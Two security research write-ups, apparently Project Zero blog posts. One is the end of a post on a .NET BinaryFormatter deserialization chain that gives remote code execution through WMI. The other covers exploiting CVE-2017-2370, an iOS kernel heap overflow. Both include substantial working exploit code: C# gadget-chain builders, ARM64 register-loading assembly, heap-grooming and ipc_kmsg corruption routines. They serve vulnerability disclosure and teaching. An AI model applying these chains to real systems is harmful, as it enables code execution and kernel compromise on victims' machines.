Looking at the implementation, the class is used as a serialization surrogate exposed through the ActivitySurrogateSelector class. This is a feature of the .NET serialization API: you can specify a “surrogate selector” during the serialization process which will replace an object with a surrogate class. When the stream is deserialized this surrogate class contains enough information to reconstruct the original object. One use case is to handle the serialization of non-serializable classes, but ObjectSerializedRef goes beyond a specific use case and allows you to deserialize anything. A test was in order:
// Definitely non-serializable class.
class NonSerializable {
  private string _text;

  public NonSerializable(string text) {
    _text = text;
  }

  public override string ToString() {
    return _text;
  }
}

// Custom serialization surrogate.
class MySurrogateSelector : SurrogateSelector {
  public override ISerializationSurrogate GetSurrogate(Type type,
      StreamingContext context, out ISurrogateSelector selector) {
    selector = this;
    if (!type.IsSerializable) {
      Type t = Type.GetType("ActivitySurrogateSelector+ObjectSurrogate");
      return (ISerializationSurrogate)Activator.CreateInstance(t);
    }

    return base.GetSurrogate(type, context, out selector);
  }
}

static void TestObjectSerializedRef() {
    BinaryFormatter fmt = new BinaryFormatter();
    MemoryStream stm = new MemoryStream();
    fmt.SurrogateSelector = new MySurrogateSelector();
    fmt.Serialize(stm, new NonSerializable("Hello World!"));
    stm.Position = 0;

    // Should print Hello World!.
    Console.WriteLine(fmt.Deserialize(stm));
}
The ObjectSurrogate class seems to work almost too well. This class totally destroys any hope of securing an untrusted BinaryFormatter stream, and it’s available from .NET 3.0. Any class which didn’t mark itself as serializable is now a target. It’s going to be pretty easy to find a class which will invoke an arbitrary delegate during deserialization, as developers will not have done anything to guard against such an attack vector.
Now just to choose a target to build out our deserialization chain. I could have chosen to poke further at the Workflow classes, but the API is horrible (in fact in .NET 4 Microsoft replaced the old APIs with a new, slightly nicer one). Instead I’ll pick a really easy to use target, Language Integrated Query (LINQ).
LINQ was introduced in .NET 3.5 as a core language feature. A new SQL-like syntax was introduced to the C# and VB compilers to perform queries across enumerable objects, such as Lists or Dictionaries. An example of the syntax which filters a list of names based on length and returns the list uppercased is as follows:
string[] names = { "Alice", "Bob", "Carl" };

IEnumerable<string> query = from name in names
                            where name.Length > 3
                            orderby name
                            select name.ToUpper();

foreach (string item in query) {
  Console.WriteLine(item);
}
You can also view LINQ not as a query syntax but instead a way of doing list comprehension in .NET. If you think of ‘select’ as equivalent to ‘map’ and ‘where’ to ‘filter’ it might make more sense. Underneath the query syntax is a series of methods implemented in the System.Linq.Enumerable class. You can write it using normal C# syntax instead of the query language; if you do the previous example becomes the following:
IEnumerable<string> query = names.Where(name => name.Length > 3)
                                .OrderBy(name => name)
                                .Select(name => name.ToUpper());
The methods such as Where take two parameters: a list object (hidden in the above example) and a delegate to invoke for each entry in the enumerable list. The delegate is typically provided by the application, however there’s nothing to stop you replacing the delegates with system methods. The important thing to bear in mind is that the delegates are not invoked until the list is enumerated. This means we can build an enumerable list using LINQ methods, serialize it using the ObjectSurrogate (LINQ classes are not themselves serializable), then if we can force the deserialized list to be enumerated it will execute arbitrary code.
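The deferred-execution property is easy to demonstrate in isolation; in this small sketch nothing runs until the query is enumerated:

```csharp
using System;
using System.Collections.Generic;
using System.Linq;

class DeferredDemo {
  static void Main() {
    int calls = 0;

    // Build the query: the delegate is stored, not invoked.
    IEnumerable<int> query = new[] { 1, 2, 3 }
        .Select(x => { calls++; return x * 2; });

    Console.WriteLine(calls);       // prints 0: nothing has run yet

    foreach (int i in query) { }    // enumeration invokes the delegate

    Console.WriteLine(calls);       // prints 3: once per element
  }
}
```

This is exactly why a deserialized LINQ pipeline is safe to carry around in a stream and only detonates when something walks it.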
Using LINQ as a primitive we can create a list which, when enumerated, maps a byte array to instances of the types in that byte array: first load the byte array as an Assembly, then extract the types the Assembly contains, and finally create an instance of each type.
The only tricky part is the second step: we’d like to extract a specific type, but our only real option is the Enumerable.Join method, which requires some weird kludges to get it to work. A better option would have been Enumerable.Zip, but that was only introduced in .NET 4. So instead we’ll just get all the types in the loaded assembly and create them all; if there’s only one type this makes no difference. How does the implementation look in C#?
static IEnumerable CreateLinq(byte[] assembly) {
  List<byte[]> base_list = new List<byte[]>();
  base_list.Add(assembly);

  var get_types_del = (Func<Assembly, IEnumerable<Type>>)
                        Delegate.CreateDelegate(
                          typeof(Func<Assembly, IEnumerable<Type>>),
                          typeof(Assembly).GetMethod("GetTypes"));

  return base_list.Select(Assembly.Load)
                  .SelectMany(get_types_del)
                  .Select(Activator.CreateInstance);
}
The only non-obvious part of the C# implementation is the delegate for Assembly::GetTypes. What we need is a delegate which takes an Assembly object and returns a list of Type objects. However, as GetTypes is an instance method, the default would be to capture the Assembly object and store it inside the delegate, resulting in a delegate which takes no parameters and returns a list of Type. We can get around this by using the reflection APIs to create an open delegate to an instance member. An open delegate doesn’t store the object instance; instead it exposes it as an additional Assembly parameter, exactly what we want.
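A small standalone sketch of an open instance delegate (here over String::ToUpperInvariant rather than Assembly::GetTypes) shows the receiver turning into an explicit parameter:

```csharp
using System;

class OpenDelegateDemo {
  static void Main() {
    // Open instance delegate: no target object is captured, so the
    // receiver ("this") becomes the delegate's first parameter.
    var toUpper = (Func<string, string>)Delegate.CreateDelegate(
        typeof(Func<string, string>),
        typeof(string).GetMethod("ToUpperInvariant", Type.EmptyTypes));

    // The string we pass is the instance the method runs against.
    Console.WriteLine(toUpper("attack"));   // prints ATTACK
  }
}
```

The same pattern with Func&lt;Assembly, IEnumerable&lt;Type&gt;&gt; and Assembly.GetTypes gives the serializable-friendly delegate the chain needs.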
With our enumerable list we can get the assembly loaded and our own code executed, but how do we get the list enumerated to start the chain? For this I decided to try and find a class which would enumerate the list when ToString (a pretty common method) is called. This is easy in Java; almost all the collection classes have this exact behavior. Sadly it seems .NET doesn’t follow Java in this respect. So I modified my analysis tools to hunt for gadgets which would get us there. To cut a long story short, I found a chain from ToString to IEnumerable through three separate classes. The chain looks something like the following:
Are we done yet? No, just one more step: we need to call ToString on an arbitrary object during deserialization. Of course I wouldn’t have chosen ToString if I didn’t already have a method of doing this. For this final step I’ll go back to abusing poor, old Hashtable. During deserialization the Hashtable class rebuilds its key set, which we already know about as this is how I exploited serialization for local EoP. If two keys are equal the deserialization will fail, with the Hashtable throwing an exception and running the following code:
throw new ArgumentException(
    Environment.GetResourceString("Argument_AddingDuplicate__",
                                  buckets[bucketNumber].key, key));
It’s not immediately obvious why this would be useful. But perhaps looking at the implementation of GetResourceString will make it clearer:
internal static String GetResourceString(String key, params Object[] values) {
    String s = GetResourceString(key);
    return String.Format(CultureInfo.CurrentCulture, s, values);
}
The key is passed to GetResourceString in the values array, along with the name of a resource string. The resource string is looked up and, together with the values, passed to String.Format. The resource string contains formatting codes, so when String.Format encounters the non-string value it calls ToString on the object to format it. This results in ToString being called during deserialization, kicking off the chain of events which leads to loading an arbitrary .NET assembly from memory and executing code in the context of the WMI client.
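This formatting behaviour is easy to verify in isolation. In the sketch below, a hypothetical class with an overridden ToString records that formatting invoked it:

```csharp
using System;

// Hypothetical stand-in for the attacker-controlled duplicate key:
// its ToString records that it was called as a side effect.
class Spy {
  public static bool Called;

  public override string ToString() {
    Called = true;
    return "spy";
  }
}

class FormatDemo {
  static void Main() {
    // Formatting a non-string argument makes String.Format call its
    // ToString, which is the hook the Hashtable exception message gives us.
    string s = String.Format("{0}: duplicate key '{1}'",
                             "Argument_AddingDuplicate", new Spy());
    Console.WriteLine(Spy.Called);   // prints True
    Console.WriteLine(s);            // prints Argument_AddingDuplicate: duplicate key 'spy'
  }
}
```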
You can see the final implementation in the latest PoC I’ve added to the issue tracker.
Conclusions
Microsoft fixed the RCE issue by ensuring that the System.Management classes never directly create an RCW for a WMI object. However this fix doesn’t affect any other use of DCOM in .NET, so privileged .NET DCOM servers are still vulnerable and other remote DCOM applications could also be attacked.
Also, this should be a lesson never to deserialize untrusted data using the .NET BinaryFormatter class. It’s a dangerous thing to do at the best of times, but it seems the developers have abandoned any hope of making serializable classes secure. The presence of ObjectSurrogate effectively means that every class in the runtime is serializable, whether the original developer wanted it to be or not.
And as a final thought, you should always be skeptical about the security of middleware, especially if you can’t inspect what it does. The fact that the IManagedObject issue is designed in and hard to remove makes it very difficult to fix correctly.
Categories: Security

Exception-oriented exploitation on iOS

Google Project Zero - Tue, 04/18/2017 - 12:06
Posted by Ian Beer, Project Zero
This post covers the discovery and exploitation of CVE-2017-2370, a heap buffer overflow in the mach_voucher_extract_attr_recipe_trap mach trap. It covers the bug, the development of an exploitation technique which involves repeatedly and deliberately crashing, and how to build live kernel introspection features using old kernel exploits.
It’s a trap!
Alongside a large number of BSD syscalls (like ioctl, mmap, execve and so on) XNU also has a small number of extra syscalls supporting the MACH side of the kernel called mach traps. Mach trap syscall numbers start at 0x1000000. Here’s a snippet from the syscall_sw.c file where the trap table is defined:
/* 12 */ MACH_TRAP(_kernelrpc_mach_vm_deallocate_trap, 3, 5, munge_wll),
/* 13 */ MACH_TRAP(kern_invalid, 0, 0, NULL),
/* 14 */ MACH_TRAP(_kernelrpc_mach_vm_protect_trap, 5, 7, munge_wllww),
Most of the mach traps are fast-paths for kernel APIs that are also exposed via the standard MACH MIG kernel APIs. For example mach_vm_allocate is also a MIG RPC which can be called on a task port.
Mach traps provide a faster interface to these kernel functions by avoiding the serialization and deserialization overheads involved in calling kernel MIG APIs. But without that autogenerated code, complex mach traps often have to do lots of manual argument parsing, which is tricky to get right.
In iOS 10 a new entry appeared in the mach_traps table:
/* 72 */ MACH_TRAP(mach_voucher_extract_attr_recipe_trap, 4, 4, munge_wwww),
The mach trap entry code will pack the arguments passed to that trap by userspace into this structure:
  struct mach_voucher_extract_attr_recipe_args {
    PAD_ARG_(mach_port_name_t, voucher_name);
    PAD_ARG_(mach_voucher_attr_key_t, key);
    PAD_ARG_(mach_voucher_attr_raw_recipe_t, recipe);
    PAD_ARG_(user_addr_t, recipe_size);
  };
A pointer to that structure will then be passed to the trap implementation as the first argument. It’s worth noting at this point that adding a new syscall like this means it can be called from every sandboxed process on the system. Up until you reach a mandatory access control hook (and there are none here) the sandbox provides no protection.
Let’s walk through the trap code:
kern_return_t
mach_voucher_extract_attr_recipe_trap(
  struct mach_voucher_extract_attr_recipe_args *args)
{
  ipc_voucher_t voucher = IV_NULL;
  kern_return_t kr = KERN_SUCCESS;
  mach_msg_type_number_t sz = 0;
  if (copyin(args->recipe_size, (void *)&sz, sizeof(sz)))
    return KERN_MEMORY_ERROR;
copyin has similar semantics to copy_from_user on Linux. This copies 4 bytes from the userspace pointer args->recipe_size to the sz variable on the kernel stack, ensuring that the whole source range really is in userspace and returning an error code if the source range either wasn’t completely mapped or pointed to kernel memory. The attacker now controls sz.
mach_msg_type_number_t is a 32-bit unsigned type so sz has to be less than or equal to MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE (5120) to continue.
  voucher = convert_port_name_to_voucher(args->voucher_name);
  if (voucher == IV_NULL)
    return MACH_SEND_INVALID_DEST;
convert_port_name_to_voucher looks up the args->voucher_name mach port name in the calling task’s mach port namespace and checks whether it names an ipc_voucher object, returning a reference to the voucher if it does. So we need to provide a valid voucher port as voucher_name to continue past here.
  if (sz < MACH_VOUCHER_TRAP_STACK_LIMIT) {
    /* keep small recipes on the stack for speed */
    uint8_t krecipe[sz];
    if (copyin(args->recipe, (void *)krecipe, sz)) {
      kr = KERN_MEMORY_ERROR;
      goto done;
    }
    kr = mach_voucher_extract_attr_recipe(voucher,
             args->key, (mach_voucher_attr_raw_recipe_t)krecipe, &sz);
    if (kr == KERN_SUCCESS && sz > 0)
      kr = copyout(krecipe, (void *)args->recipe, sz);
  }
If sz was less than MACH_VOUCHER_TRAP_STACK_LIMIT (256) then this allocates a small variable-length-array on the kernel stack and copies in sz bytes from the userspace pointer in args->recipe to that VLA. The code then calls the target mach_voucher_extract_attr_recipe method before calling copyout (which takes its kernel and userspace arguments the other way round to copyin) to copy the results back to userspace. All looks okay, so let’s take a look at what happens if sz was too big to let the recipe be “kept on the stack for speed”:
  else {
    uint8_t *krecipe = kalloc((vm_size_t)sz);
    if (!krecipe) {
      kr = KERN_RESOURCE_SHORTAGE;
      goto done;
    }
    if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) {
      kfree(krecipe, (vm_size_t)sz);
      kr = KERN_MEMORY_ERROR;
      goto done;
    }
The code continues on but let’s stop here and look really carefully at that snippet. It calls kalloc to make an sz-byte sized allocation on the kernel heap and assigns the address of that allocation to krecipe. It then calls copyin to copy args->recipe_size bytes from the args->recipe userspace pointer to the krecipe kernel heap buffer.
If you didn’t spot the bug yet, go back up to the start of the code snippets and read through them again. This is a case of a bug that’s so completely wrong that at first glance it actually looks correct!
To explain the bug it’s worth donning our detective hat and trying to work out what happened to cause such code to be written. This is just conjecture but I think it’s quite plausible.
a recipe for copypasta
Right above the mach_voucher_extract_attr_recipe_trap method in mach_kernelrpc.c there’s the code for host_create_mach_voucher_trap, another mach trap.
These two functions look very similar. They both have a branch for a small and large input size, with the same /* keep small recipes on the stack for speed */ comment in the small path and they both make a kernel heap allocation in the large path.
It’s pretty clear that the code for mach_voucher_extract_attr_recipe_trap has been copy-pasted from host_create_mach_voucher_trap then updated to reflect the subtle difference in their prototypes. That difference is that the size argument to host_create_mach_voucher_trap is an integer but the size argument to mach_voucher_extract_attr_recipe_trap is a pointer to an integer.
This means that mach_voucher_extract_attr_recipe_trap requires an extra level of indirection; it first needs to copyin the size before it can use it. Even more confusingly the size argument in the original function was called recipes_size and in the newer function it’s called recipe_size (one fewer ‘s’.)
Here’s the relevant code from the two functions, the first snippet is fine and the second has the bug:
  if (copyin(args->recipes, (void *)krecipes, args->recipes_size)) {
    kfree(krecipes, (vm_size_t)args->recipes_size);
    kr = KERN_MEMORY_ERROR;
    goto done;
  }
  if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) {
    kfree(krecipe, (vm_size_t)sz);
    kr = KERN_MEMORY_ERROR;
    goto done;
  }
My guess is that the developer copy-pasted the code for the entire function then tried to add the extra level of indirection but forgot to change the third argument to the copyin call shown above. They built XNU and looked at the compiler error messages. XNU builds with clang, which gives you fancy error messages like this:
error: no member named 'recipes_size' in 'struct mach_voucher_extract_attr_recipe_args'; did you mean 'recipe_size'?
if (copyin(args->recipes, (void *)krecipes, args->recipes_size)) {
                                                  ^~~~~~~~~~~~
                                                  recipe_size
Clang assumes that the developer has made a typo and typed an extra ‘s’. Clang doesn’t realize that its suggestion is semantically totally wrong and will introduce a critical memory corruption issue. I think that the developer took clang’s suggestion, removed the ‘s’, rebuilt and the code compiled without errors.
Building primitives
copyin on iOS will fail if the size argument is greater than 0x4000000. Since recipe_size also needs to be a valid userspace pointer, this means we have to be able to map an address that low. From a 64-bit iOS app we can do this by giving the pagezero_size linker option a small value. We can completely control the size of the copy by ensuring that our data is aligned right up to the end of a page and then unmapping the page after it. copyin will fault when the copy reaches the unmapped source page and stop.

If the copyin fails the kalloced buffer will be immediately freed.
Putting all the bits together we can make a kalloc heap allocation of between 256 and 5120 bytes and overflow out of it as much as we want with completely controlled data.
When I’m working on a new exploit I spend a lot of time looking for new primitives; for example, objects allocated on the heap which, if I could overflow into them, would cause a chain of interesting things to happen. Generally, interesting means that if I corrupt it I can use it to build a better primitive. Usually my end goal is to chain these primitives to get an arbitrary, repeatable and reliable memory read/write.
To this end one style of object I’m always on the lookout for is something that contains a length or size field which can be corrupted without having to fully corrupt any pointers. This is usually an interesting target and warrants further investigation.
For anyone who has ever written a browser exploit this will be a familiar construct!
ipc_kmsg
Reading through the XNU code for interesting looking primitives I came across struct ipc_kmsg:
struct ipc_kmsg {
  mach_msg_size_t            ikm_size;
  struct ipc_kmsg            *ikm_next;
  struct ipc_kmsg            *ikm_prev;
  mach_msg_header_t          *ikm_header;
  ipc_port_t                 ikm_prealloc;
  ipc_port_t                 ikm_voucher;
  mach_msg_priority_t        ikm_qos;
  mach_msg_priority_t        ikm_qos_override;
  struct ipc_importance_elem *ikm_importance;
  queue_chain_t              ikm_inheritance;
};
This is a structure which has a size field that can be corrupted without needing to know any pointer values. How is the ikm_size field used?
Looking for cross references to ikm_size in the code we can see it’s only used in a handful of places:
void ipc_kmsg_free(ipc_kmsg_t kmsg);
This function uses kmsg->ikm_size to free the kmsg back to the correct kalloc zone. The zone allocator will detect frees to the wrong zone and panic so we’ll have to be careful that we don’t free a corrupted ipc_kmsg without first fixing up the size.
This macro is used to set the ikm_size field:
#define ikm_init(kmsg, size)  \
MACRO_BEGIN                   \
  (kmsg)->ikm_size = (size);  \
MACRO_END
This macro uses the ikm_size field to set the ikm_header pointer:
#define ikm_set_header(kmsg, mtsize)                         \
MACRO_BEGIN                                                  \
  (kmsg)->ikm_header = (mach_msg_header_t *)                 \
  ((vm_offset_t)((kmsg) + 1) + (kmsg)->ikm_size - (mtsize)); \
MACRO_END
That macro is using the ikm_size field to set the ikm_header field such that the message is aligned to the end of the buffer; this could be interesting.
Finally there’s a check in ipc_kmsg_get_from_kernel:
  if (msg_and_trailer_size > kmsg->ikm_size - max_desc) {
    ip_unlock(dest_port);
    return MACH_SEND_TOO_LARGE;
  }
That’s using the ikm_size field to ensure that there’s enough space in the ipc_kmsg buffer for a message.
It looks like if we corrupt the ikm_size field we’ll be able to make the kernel believe that a message buffer is bigger than it really is which will almost certainly lead to message contents being written out of bounds. But haven’t we just turned a kernel heap overflow into... another kernel heap overflow? The difference this time is that a corrupted ipc_kmsg might also let me read memory out of bounds. This is why corrupting the ikm_size field could be an interesting thing to investigate.
It’s about sending a message
ipc_kmsg structures are used to hold in-transit mach messages. When userspace sends a mach message we end up in ipc_kmsg_alloc. If the message is small (less than IKM_SAVED_MSG_SIZE) then the code will first look in a cpu-local cache for recently freed ipc_kmsg structures. If none are found it will allocate a new cacheable message from the dedicated ipc.kmsg zalloc zone.
Larger messages bypass this cache and are directly allocated by kalloc, the general purpose kernel heap allocator. After allocating the buffer the structure is immediately initialized using the two macros we saw:
  kmsg = (ipc_kmsg_t)kalloc(ikm_plus_overhead(max_expanded_size));
...
  if (kmsg != IKM_NULL) {
    ikm_init(kmsg, max_expanded_size);
    ikm_set_header(kmsg, msg_and_trailer_size);
  }
Unless we’re able to corrupt the ikm_size field in between those two macros the most we’d be able to do is cause the message to be freed to the wrong zone and immediately panic. Not so useful.
But ikm_set_header is called in one other place: ipc_kmsg_get_from_kernel.
This function is only used when the kernel sends a real mach message; it’s not used for sending replies to kernel MIG apis for example. The function’s comment explains more:
 * Routine: ipc_kmsg_get_from_kernel
 * Purpose:
 *   First checks for a preallocated message
 *   reserved for kernel clients.  If not found -
 *   allocates a new kernel message buffer.
 *   Copies a kernel message to the message buffer.
Using the mach_port_allocate_full method from userspace we can allocate a new mach port which has a single preallocated ikm_kmsg buffer of a controlled size. The intended use-case is to allow userspace to receive critical messages without the kernel having to make a heap allocation. Each time the kernel sends a real mach message it first checks whether the port has one of these preallocated buffers and it’s not currently in-use. We then reach the following code (I’ve removed the locking and 32-bit only code for brevity):
  if (IP_VALID(dest_port) && IP_PREALLOC(dest_port)) {
    mach_msg_size_t max_desc = 0;

    kmsg = dest_port->ip_premsg;
    if (ikm_prealloc_inuse(kmsg)) {
      ip_unlock(dest_port);
      return MACH_SEND_NO_BUFFER;
    }
    if (msg_and_trailer_size > kmsg->ikm_size - max_desc) {
      ip_unlock(dest_port);
      return MACH_SEND_TOO_LARGE;
    }
    ikm_prealloc_set_inuse(kmsg, dest_port);
    ikm_set_header(kmsg, msg_and_trailer_size);
    ip_unlock(dest_port);
...
    (void) memcpy((void *) kmsg->ikm_header, (const void *) msg, size);
This code checks whether the message would fit (trusting kmsg->ikm_size), marks the preallocated buffer as in-use, calls the ikm_set_header macro which sets ikm_header such that the message will align to the end of the buffer, and finally calls memcpy to copy the message into the ipc_kmsg.

This means that if we can corrupt the ikm_size field of a preallocated ipc_kmsg and make it appear larger than it is then when the kernel sends a message it will write the message contents off the end of the preallocate message buffer.
ikm_header is also used in the mach message receive path, so when we dequeue the message it will also read out of bounds. If we could replace whatever was originally after the message buffer with data we want to read we could then read it back as part of the contents of the message.
This new primitive we’re building is more powerful in another way: if we get this right we’ll be able to read and write out of bounds in a repeatable, controlled way without having to trigger a bug each time.
Exceptional behaviour
There’s one difficulty with preallocated messages: because they’re only used when the kernel sends a message to us we can’t just send a message with controlled data and get it to use the preallocated ipc_kmsg. Instead we need to persuade the kernel to send us a message with data we control; this is much harder!
There are only a handful of places where the kernel actually sends userspace a mach message. There are various types of notification messages like IODataQueue data-available notifications, IOServiceUserNotifications and no-senders notifications. These usually only contain a small amount of user-controlled data. The only message types sent by the kernel which seem to contain a decent amount of user-controlled data are exception messages.
When a thread faults (for example by accessing unallocated memory or calling a software breakpoint instruction) the kernel will send an exception message to the thread’s registered exception handler port.
If a thread doesn’t have an exception handler port the kernel will try to send the message to the task’s exception handler port, and if that also fails the exception message will be delivered to the global host exception port. A thread can normally set its own exception port, but setting the host exception port is a privileged action.
routine thread_set_exception_ports(
         thread         : thread_act_t;
         exception_mask : exception_mask_t;
         new_port       : mach_port_t;
         behavior       : exception_behavior_t;
         new_flavor     : thread_state_flavor_t);
This is the MIG definition for thread_set_exception_ports. new_port should be a send right to the new exception port. exception_mask lets us restrict the types of exceptions we want to handle. behavior defines what type of exception message we want to receive and new_flavor lets us specify what kind of process state we want to be included in the message.
Passing an exception_mask of EXC_MASK_ALL, EXCEPTION_STATE for behavior and ARM_THREAD_STATE64 for new_flavor means that the kernel will send an exception_raise_state message to the exception port we specify whenever the specified thread faults. That message will contain the state of all the ARM64 general purposes registers, and that’s what we’ll use to get controlled data written off the end of the ipc_kmsg buffer!
Some assembly required...
In our iOS Xcode project we can add a new assembly file and define a function load_regs_and_crash:
.text
.globl  _load_regs_and_crash
.align  2
_load_regs_and_crash:
mov x30, x0
ldp x0, x1, [x30, 0]
ldp x2, x3, [x30, 0x10]
ldp x4, x5, [x30, 0x20]
ldp x6, x7, [x30, 0x30]
ldp x8, x9, [x30, 0x40]
ldp x10, x11, [x30, 0x50]
ldp x12, x13, [x30, 0x60]
ldp x14, x15, [x30, 0x70]
ldp x16, x17, [x30, 0x80]
ldp x18, x19, [x30, 0x90]
ldp x20, x21, [x30, 0xa0]
ldp x22, x23, [x30, 0xb0]
ldp x24, x25, [x30, 0xc0]
ldp x26, x27, [x30, 0xd0]
ldp x28, x29, [x30, 0xe0]
brk 0
.align  3
This function takes a pointer to a 240 byte buffer as the first argument and assigns each of the first 30 ARM64 general-purpose registers a value from that buffer, such that when it triggers a software interrupt via brk 0 and the kernel sends an exception message, that message contains the bytes from the input buffer in the same order.
We’ve now got a way to get controlled data in a message which will be sent to a preallocated port, but what value should we overwrite the ikm_size with to get the controlled portion of the message to overlap with the start of the following heap object? It’s possible to determine this statically, but it would be much easier if we could just use a kernel debugger and take a look at what happens. However iOS only runs on very locked-down hardware with no supported way to do kernel debugging.
I’m going to build my own kernel debugger (with printfs and hexdumps)
A proper debugger has two main features: breakpoints and memory peek/poke. Implementing breakpoints is a lot of work but we can still build a meaningful kernel debugging environment just using kernel memory access.
There’s a bootstrapping problem here; we need a kernel exploit which gives us kernel memory access in order to develop our kernel exploit to give us kernel memory access! In December I published the mach_portal iOS kernel exploit which gives you kernel memory read/write, and as part of that I wrote a handful of kernel introspection functions which allow you to find process task structures and look up mach port objects by name. We can build one more level on that and dump the kobject pointer of a mach port.
The first version of this new exploit was developed inside the mach_portal Xcode project so I could reuse all the code. After everything was working I ported it from iOS 10.1.1 to iOS 10.2.
Inside mach_portal I was able to find the address of a preallocated port buffer like this:
  // allocate an ipc_kmsg:
  kern_return_t err;
  mach_port_qos_t qos = {0};
  qos.prealloc = 1;
  qos.len = size;

  mach_port_name_t name = MACH_PORT_NULL;

  err = mach_port_allocate_full(mach_task_self(),
                                MACH_PORT_RIGHT_RECEIVE,
                                MACH_PORT_NULL,
                                &qos,
                                &name);
  uint64_t port = get_port(name);
  uint64_t prealloc_buf = rk64(port+0x88);
  printf("0x%016llx,\n", prealloc_buf);
get_port was part of the mach_portal exploit and is defined like this:
uint64_t get_port(mach_port_name_t port_name){
  return proc_port_name_to_port_ptr(our_proc, port_name);
}
uint64_t proc_port_name_to_port_ptr(uint64_t proc, mach_port_name_t port_name) {
  uint64_t ports = get_proc_ipc_table(proc);
  uint32_t port_index = port_name >> 8;
  uint64_t port = rk64(ports + (0x18*port_index)); // ie_object
  return port;
}
uint64_t get_proc_ipc_table(uint64_t proc) {
  uint64_t task_t = rk64(proc + struct_proc_task_offset);
  uint64_t itk_space = rk64(task_t + struct_task_itk_space_offset);
  uint64_t is_table = rk64(itk_space + struct_ipc_space_is_table_offset);
  return is_table;
}
These code snippets are using the rk64() function provided by the mach_portal exploit which reads kernel memory via the kernel task port.
I used this method with some trial and error to determine the correct value to overwrite ikm_size to be able to align the controlled portion of an exception message with the start of the next heap object.
get-where-what
The final piece of the puzzle is the ability to know where controlled data is; rather than write-what-where we want to get where what is.
One way to achieve this in the context of a local privilege escalation exploit is to place this kind of data in userspace, but hardware mitigations like SMAP on x86 and the AMCC hardware on iPhone 7 make this harder. Therefore we’ll construct a new primitive to find out where our ipc_kmsg buffer is in kernel memory.
One aspect I haven’t touched on up until now is how to get the ipc_kmsg allocation next to the buffer we’ll overflow out of. Stefan Esser has covered the evolution of the zalloc heap for the last few years in a series of conference talks, the latest talk has details of the zone freelist randomization.
Whilst experimenting with the heap behaviour using the introspection techniques described above I noticed that some size classes would actually still give you close to linear allocation behavior (later allocations are contiguous.) It turns out this is due to the lower-level allocator which zalloc gets pages from; by exhausting a particular zone we can force zalloc to fetch new pages and if our allocation size is close to the page size we’ll just get that page back immediately.
This means we can use code like this:
  int prealloc_size = 0x900; // kalloc.4096

  for (int i = 0; i < 2000; i++){
    prealloc_port(prealloc_size);
  }

  // these will be contiguous now, convenient!
  mach_port_t holder = prealloc_port(prealloc_size);
  mach_port_t first_port = prealloc_port(prealloc_size);
  mach_port_t second_port = prealloc_port(prealloc_size);

to get a heap layout like this:

This is not completely reliable; for devices with more RAM you’ll need to increase the iteration count for the zone exhaustion loop. It’s not a perfect technique but it works well enough for a research tool.
We can now free the holder port; trigger the overflow which will reuse the slot where holder was and overflow into first_port then grab the slot again with another holder port:
 // free the holder:  mach_port_destroy(mach_task_self(), holder);
  // reallocate the holder and overflow out of it
  uint64_t overflow_bytes[] = {0x1104,0,0,0,0,0,0,0};
  do_overflow(0x1000, 64, overflow_bytes);

  // grab the holder again
  holder = prealloc_port(prealloc_size);

The overflow has changed the ikm_size field of the preallocated ipc_kmsg belonging to first_port to 0x1104.
After the ipc_kmsg structure has been filled in by ipc_kmsg_get_from_kernel it will be enqueued into the target port’s queue of pending messages by ipc_kmsg_enqueue:
void ipc_kmsg_enqueue(ipc_kmsg_queue_t queue,
                      ipc_kmsg_t       kmsg)
{
  ipc_kmsg_t first = queue->ikmq_base;
  ipc_kmsg_t last;
  if (first == IKM_NULL) {
    queue->ikmq_base = kmsg;
    kmsg->ikm_next = kmsg;
    kmsg->ikm_prev = kmsg;
  } else {
    last = first->ikm_prev;
    kmsg->ikm_next = first;
    kmsg->ikm_prev = last;
    first->ikm_prev = kmsg;
    last->ikm_next = kmsg;
  }
}
If the port has pending messages the ikm_next and ikm_prev fields of the ipc_kmsg form a doubly-linked list of pending messages. But if the port has no pending messages then ikm_next and ikm_prev are both set to point back to kmsg itself. The following interleaving of message sends and receives will allow us to use this fact to read back the address of the second ipc_kmsg buffer:
  uint64_t valid_header[] = {0xc40, 0, 0, 0, 0, 0, 0, 0};
  send_prealloc_msg(first_port, valid_header, 8);

  // send a message to the second port
  // writing a pointer to itself in the prealloc buffer
  send_prealloc_msg(second_port, valid_header, 8);

  // receive on the first port, reading the header of the second:
  uint64_t* buf = receive_prealloc_msg(first_port);

  // this is the address of second port
  kernel_buffer_base = buf[1];

Here’s the implementation of send_prealloc_msg:
void send_prealloc_msg(mach_port_t port, uint64_t* buf, int n) {
  struct thread_args* args = malloc(sizeof(struct thread_args));
  memset(args, 0, sizeof(struct thread_args));
  memcpy(args->buf, buf, n*8);

  args->exception_port = port;

  // start a new thread passing it the buffer and the exception port
  pthread_t t;
  pthread_create(&t, NULL, do_thread, (void*)args);

  // associate the pthread_t with the port
  // so that we can join the correct pthread
  // when we receive the exception message and it exits:
  kern_return_t err = mach_port_set_context(mach_task_self(),
                                            port,
                                            (mach_port_context_t)t);
  // wait until the message has actually been sent:
  while(!port_has_message(port)){;}
}
Remember that to get the controlled data into port’s preallocated ipc_kmsg we need the kernel to send the exception message to it, so send_prealloc_msg actually has to cause that exception. It allocates a struct thread_args which contains a copy of the controlled data we want in the message and the target port, then it starts a new thread which will call do_thread:
void* do_thread(void* arg) {
  struct thread_args* args = (struct thread_args*)arg;
  uint64_t buf[32];
  memcpy(buf, args->buf, sizeof(buf));

  kern_return_t err;
  err = thread_set_exception_ports(mach_thread_self(),
                                   EXC_MASK_ALL,
                                   args->exception_port,
                                   EXCEPTION_STATE,
                                   ARM_THREAD_STATE64);
  free(args);

  load_regs_and_crash(buf);
  return NULL;
}
do_thread copies the controlled data from the thread_args structure to a local buffer then sets the target port as this thread’s exception handler. It frees the arguments structure then calls load_regs_and_crash which is the assembler stub that copies the buffer into the first 30 ARM64 general purpose registers and triggers a software breakpoint.
At this point the kernel’s interrupt handler will call exception_deliver, which will look up the thread’s exception port and call the MIG mach_exception_raise_state method. That will serialize the crashing thread’s register state into a MIG message and call mach_msg_rpc_from_kernel_body, which will grab the exception port’s preallocated ipc_kmsg, trust the ikm_size field and use it to align the sent message to what it believes to be the end of the buffer:

In order to actually read data back we need to receive the exception message. In this case we got the kernel to send a message to the first port which had the effect of writing a valid header over the second port. Why use a memory corruption primitive to overwrite the next message’s header with the same data it already contains?
